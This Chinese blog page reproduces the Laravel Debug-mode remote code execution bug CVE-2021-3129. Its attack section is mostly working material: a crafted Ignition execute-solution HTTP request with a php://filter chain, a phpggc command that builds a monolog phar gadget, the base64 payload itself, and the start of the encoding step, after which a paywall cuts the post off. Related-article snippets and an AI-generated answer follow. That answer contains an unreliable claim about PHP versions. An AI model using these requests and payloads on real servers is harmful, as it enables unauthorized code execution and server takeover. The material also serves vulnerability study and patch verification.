漏洞复现--laravel<=8.4.2 Debug RCE

最新推荐文章于 2025-07-19 20:42:55 发布
原创 最新推荐文章于 2025-07-19 20:42:55 发布 · 544 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#laravel #安全 #php

本文介绍了2021年Laravel存在的远程代码执行漏洞(CVE-2021-3129),详细阐述了漏洞复现过程,包括清空log、生成phar文件、quoted-printable-encode、写入log等步骤,并分析了漏洞的触发条件和payload的构建技巧,提醒读者避免非法利用。

声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本团队无关。

前言

2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

影响范围

laravel <= 8.4.2
Ignition <= 2.5.1
开启debug

CVE编号

CVE-2021-3129

复现步骤

清空 log

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.136.167:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.136.167:8000/_ignition/execute-solution
Content-Type: application/json
Content-Length: 320
Connection: close
Upgrade-Insecure-Requests: 1

{
	"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
	"parameters":{
		"variableName": "username",
		"viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/laravel/storage/logs/laravel.log"
	}
}

生成phar文件并base64

php -d'phar.readonly=0' ./phpggc monolog/rce1 call_user_func phpinfo --phar phar -o php://output | base64 -w0

PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C

quoted-printable-encode

Python 3.8.5 (default, Jul 28 2020, 12:59:40) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> a = 'PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQrZAgAAAgAAABEAAAABAAAAAACCAgAATzozMjoiTW9ub2xvZ1xIYW5kbGVyXFN5c2xvZ1VkcEhhbmRsZXIiOjE6e3M6OToiACoAc29ja2V0IjtPOjI5OiJNb25vbG9nXEhhbmRsZXJcQnVmZmVySGFuZGxlciI6Nzp7czoxMDoiACoAaGFuZGxlciI7TzoyOToiTW9ub2xvZ1xIYW5kbGVyXEJ1ZmZlckhhbmRsZXIiOjc6e3M6MTA6IgAqAGhhbmRsZXIiO047czoxMzoiACoAYnVmZmVyU2l6ZSI7aTotMTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czo3OiJwaHBpbmZvIjtzOjU6ImxldmVsIjtOO319czo4OiIAKgBsZXZlbCI7TjtzOjE0OiIAKgBpbml0aWFsaXplZCI7YjoxO3M6MTQ6IgAqAGJ1ZmZlckxpbWl0IjtpOi0xO3M6MTM6IgAqAHByb2Nlc3NvcnMiO2E6Mjp7aTowO3M6NzoiY3VycmVudCI7aToxO3M6MTQ6ImNhbGxfdXNlcl9mdW5jIjt9fXM6MTM6IgAqAGJ1ZmZlclNpemUiO2k6LTE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO2E6Mjp7aTowO3M6NzoicGhwaW5mbyI7czo1OiJsZXZlbCI7Tjt9fXM6ODoiACoAbGV2ZWwiO047czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjE0OiIAKgBidWZmZXJMaW1pdCI7aTotMTtzOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjc6ImN1cnJlbnQiO2k6MTtzOjE0OiJjYWxsX3VzZXJfZnVuYyI7fX19BQAAAGR1bW15BAAAANNQBGAEAAAADH5/2LQBAAAAAAAACAAAAHRlc3QudHh0BAAAANNQBGAEAAAADH5/2LQBAAAAAAAAdGVzdHRlc3R5dqEGHXRSkD3PRm3X6/hNNh1MXQIAAABHQk1C'
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in a]).upper()
'=50=00=44=00=39=00=77=00=61=00
最低0.47元/天 解锁文章
漏洞复现| Laravel Debug mode RCE(CVE-2021-3129)
qq_42570883的博客
02-05 5699
漏洞名称】 Laravel Debug mode RCE(CVE-2021-3129) 【漏洞详情】 近日,国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。 【漏洞编号】 CVE-2021-3129 【验证工具】 https://
laravel5.8 反序列化漏洞复现
Zero_Adam的博客
06-22 3044
1. 前言 依旧跟着feng师傅学吧, 还是再github上下载源码:laravel5.8。往composer.json的require里面加上"symfony/symfony": “4.*”,然后composer update。 如果提示 Allowed memory size of bytes exhausted,参考这篇文章:运行 composer update,提示 Allowed memory size of bytes exhausted 如果想我这里一样:就报个error。。(弄好之后没那个报
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
黑白的博客
05-02 1762
声明 好好学习,天天向上 漏洞描述 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 影响范围 Laravel <= 8.4.2 Ignition <2.5.2 复现过程 这里使用
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 4105
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
Laravel RCE(CVE-2021-3129)漏洞复现
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
07-13 4130
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
Laravel Debug mode远程代码执行漏洞(CVE-2021-3129)复现分析
小小猪的博客
11-13 2469
Laravel Debug mode远程代码执行漏洞(CVE-2021-3129)复现分析 漏洞描述: Laravel 是一个免费的开源 PHP Web 框架,在国内外应用十分广泛。2021年1月份,国外某安全研究团队披露了 Laravel <= 8.4.2 版本中存在远程代码执行漏洞。 当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件的某些函数功能存在过滤不严的问题,导致攻击者可以发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,造成远程代码执行,
【vulfocus漏洞复现Laravel Debug mode RCE(CVE-2021-3129)复现
一剑开天门!的博客
02-26 3422
【vulfocus漏洞复现Laravel Debug mode RCE(CVE-2021-3129)复现(由于本人现在还比较菜,勿喷!)
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 7201
Laravel 远程代码执行漏洞(CVE-2021-3129)
Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
z.mumu的博客
12-07 1786
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
Laravel 9.1.8 反序列化漏洞分析及复现
qq_54502707的博客
12-10 4126
反序列化漏洞是如今很常见的漏洞类型,有很多分类,也有很多绕过方式。本文选取了一个今年比较典型的反序列化漏洞,进行了一个分析并复现
Laravel LaRecipe renderBlade 未授权 代码注入漏洞 (CVE-2025-53833)完整复现指南
AKM4180的博客
07-19 1334
Laravel LaRecipe 文档系统存在严重代码注入漏洞(CVE-2025-53833),该漏洞源于renderBlade方法未对用户输入进行过滤,导致攻击者可通过Blade模板引擎执行任意PHP代码。本文提供了完整的漏洞复现指南,包括Docker环境搭建脚本、漏洞验证方法(如触发phpinfo())以及获取系统shell的步骤。分析指出漏洞核心在于HasBladeParser Trait中的renderBlade()方法未正确处理用户输入,允许通过构造恶意文档内容实现远程代码执行。环境搭建使用PHP
Laravel5 开启Debug
weixin_30824277的博客
08-31 922
Laravel默认没有开启Debug,打开需要两步: .env文件中设置APP_DEBUG=true; 把Laravel服务重启一下(摸索出来的)。 这只是开启了基本的调试模式,如果需要看更详细的调试信息,就要借助扩展包了。 转载于:https://www.cnblogs.com/songziqing/p/5825372.html...
Laravel命令执行漏洞
longwanlian的博客
12-12 3281
Laravel基于php搭建的开发框架。
php debug模式漏洞,Laravel <= v8.4.2调试模式造成远程代码执行漏洞
weixin_36482113的博客
04-10 1300
2020年11月底, 在为我们的一个客户进行安全审计时, 我们发现了一个基于Laravel的网站. 虽然这个网站的安全状态很好, 但我们注意到它是在调试模式下运行的, 因此显示了大量的错误信息, 包括堆栈痕迹: 经过进一步的检查, 我们发现这些堆栈痕迹是由Ignition生成的, 而Ignition是Laravel第6版开始的默认错误页面生成器. 在穷尽了其他漏洞载体之后, 我们开始对这个包进行更...
laravel5.3使用debug
keial的博客
05-03 1776
原文:https://laravel-news.com/laravel-debugbar 在laravel的project 内 composer require barryvdh/laravel-debugbar 安装好后 在./config/app.php中的providers数组中添加 'Barryvdh\Debugbar\ServiceProvider',然后在
Laravel5.7反序列化漏洞(CVE-2019-9081)
byname1的博客
03-30 1525
this->instances[$abstract]为一个application对象的话既满足了return的条件:又能返回一个application对象。这个就轻松多了,直接:这样的话就直接返回了一个application对象来调用call,我们继续跟进一下call方法。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
网络空间安全学习
10-27 1631
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask。
php8.4.2存在的漏洞
最新发布
10-29
<think>根据提供的引用材料,用户询问的是PHP 8.4.2版本存在的漏洞。然而,PHP官方版本号通常以主版本.次版本.修订号(如8.1.3)形式发布,而8.4.2这个版本号在PHP官方版本中并不存在(截至2024年,PHP最新版本系列为8.3.x)。引用[2]和[4]中提到的"Laravel <= 8.4.2"指的是Laravel框架的版本,而非PHP语言本身的版本。因此需要明确区分: 1. **PHP语言漏洞**:引用[1]提到早期PHP版本的格式字符串漏洞,但未指定具体版本。 2. **Laravel框架漏洞**:引用[2]和[4]明确描述Laravel框架<=8.4.2版本在开启Debug模式时存在远程代码执行漏洞(CVE-2021-3129)。 用户可能混淆了PHP版本和Laravel版本。根据引用内容,直接相关的漏洞Laravel框架的漏洞,而非PHP语言本身的漏洞。 **核心结论**: - PHP 8.4.2版本不存在(PHP官方无此版本号)。 - Laravel框架<=8.4.2版本存在远程代码执行漏洞(CVE-2021-3129)。 因此,需引导用户澄清: 1. 是否指PHP语言的某个版本? 2. 或实际想查询Laravel框架漏洞? 若用户坚持问PHP语言漏洞,需说明版本号异常并建议核对;若实为Laravel漏洞,则详细解释CVE-2021-3129。 </think>根据提供的参考资料,您查询的 PHP 8.4.2 版本漏洞实际上是指 **Laravel 框架**的漏洞(非 PHP 语言本体)。以下是关键信息: ### 📌 Laravel <= 8.4.2 远程代码执行漏洞(CVE-2021-3129) 1. **漏洞本质** Laravel 开启 Debug 模式时,其内置组件 Ignition 的某些接口存在过滤不严,攻击者可构造恶意请求: - 通过伪造 Log 文件触发 Phar 反序列化 - 实现任意远程代码执行,完全控制服务器[^2][^4] 2. **触发条件** ```php // 漏洞触发需满足: APP_DEBUG=true // .env 文件中开启调试模式 Laravel 版本 ≤ 8.4.2 ``` 3. **技术原理** PHP 处理 Base64 解码时会忽略非法字符(除 `=` 外),当包含 `=` 的字符串被解码时,PHP 会报错中断执行。攻击者利用这一特性绕过安全过滤[^4]。 4. **影响版本** Laravel 框架 ≤ 8.4.2 的所有版本(与 PHP 语言版本无关)[^2] ### ⚠️ 关于 PHP 语言本体 - **PHP 8.4.2 版本不存在**(截至 2024 年,PHP 官方最新版本为 8.3.x) - 引用[1]提到的早期 PHP 版本格式字符串漏洞适用于旧版 PHP(如 PHP 5.x),与 8.x 无关 ### 🔒 修复方案 1. **立即升级 Laravel** 到 ≥ 8.4.3 版本 2. **生产环境关闭 Debug 模式**(设置 `APP_DEBUG=false`) 3. **添加 WAF 规则** 拦截对 `/vendor/ignition` 路径的恶意请求
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值